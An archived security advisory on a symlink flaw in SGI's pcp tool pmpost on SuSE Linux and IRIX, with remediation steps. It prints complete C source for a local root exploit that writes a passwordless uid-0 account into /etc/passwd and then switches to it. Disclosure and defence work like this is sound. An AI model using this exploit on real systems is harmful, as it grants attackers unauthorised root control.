COMMAND
pmpost
SYSTEMS AFFECTED
PCP package (IRIX, SuSE Linux)
PROBLEM
Paul Starzetz found following. There is a symlink handling
problem in the pcp suite from SGI. The binary pmpost will follow
symlinks, if setuid root this leads to instant root compromise,
as found on SuSE 7.1.
Attached a simple C source to demonstrate this (gcc pm.c -o pm
then ./pm):
/********************************************************
* *
* pmpost local root exploit *
* vulnerable: pcp <= 2.1.11-5 *
* by IhaQueR *
* *
********************************************************/
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <sys/stat.h>
main()
{
const char *bin="/usr/share/pcp/bin/pmpost";
static char buf[512];
static char dir[128];
srand(time(NULL));
sprintf(dir, "/tmp/dupa.%.8d", rand());
if(mkdir(dir, S_IRWXU))
_exit(2);
if(chdir(dir))
_exit(3);
if(symlink("/etc/passwd", "./NOTICES"))
_exit(4);
snprintf(buf, sizeof(buf)-1, "PCP_LOG_DIR=%.500s", dir);
if(putenv(buf))
_exit(5);
if(!fork()) {
execl(bin, bin, "\nr00t::0:0:root:/root:/bin/bash", NULL);
_exit(1);
}
else {
waitpid(0, NULL, WUNTRACED);
chdir("..");
sprintf(buf, "rm -rf dupa.*");
system(buf);
execl("/bin/su", "/bin/su", "r00t", NULL);
}
}
The pmpost binary is contained in the package "pcp", as shipped
with the distributions SuSE-7.0, 7.1 and 7.2. In the distribution
7.0, /usr/share/pcp/bin/pmpost is not installed setuid root. In
7.1 and 7.2, pmpost _is_ setuid root and therefore exploitable.
The pcp package is not installed by default in any of the
distributions.
The source in src/libpcp/src/config.c reads
if ((p = getenv(var)) != NULL)
val = p;
for configuration items from /etc/pcp.conf and therefore trusts
user input/environment. The same applies for the environment
variable PCP_CONF that specifies the configuration file. This
attitude towards treating user input does not qualify for
privileged execution. The actual open(2) call in
src/pmpost/pmpost.c (near "umask(022); /* is this just paranoid?
*/) can't be fixed without completely ignoring the user-supplied
environment since open(2) can't guarantee that a path segment
leading to the file is not a symlink.
It's probably a very rare package under linux, but more common
under IRIX.
With minor modifications, above exploits yields root with the IRIX
version of PCP 2.1 running under IRIX 6.5.10. PCP 2.2 under IRIX
6.5.11+ not tested.
Comparing notes with Jan-Frode indicated that SGI has released
more than one version of PCP 2.1. Not all versions are vulnerable
(PCP 2.1 under 6.5.6m was not). One way to check if you're
vulnerable is to do a:
strings /usr/pcp/bin/pmpost | grep PCP_LOG_DIR
SOLUTION
As a temporary and permanent workaround for SuSE, remove the
setuid bits from the two programs /usr/share/pcp/bin/pmpost and
/usr/share/pcp/bin/pmkstat by using the following command (as
root):
chmod a-s /usr/share/pcp/bin/*
A change to /etc/permissions* is not necessary because the two
binaries are not listed there. Users of the package might want
to change ownerships to make the functionality of the pmpost
program available again. Alternatively, users may want to delete
the package if it is not used: rpm --nodeps -e pcp.
Performance Co-Pilot (version 2.2.1-3) is now available. This
version contains fixes for the recent security issues uncovered
against the earlier 2.2.0-18 release. Please upgrade; the new
source and binary RPMs are available from
http://oss.sgi.com/projects/pcp/download
For PCP on IRIX, a patch will be available shortly for SGI
customers.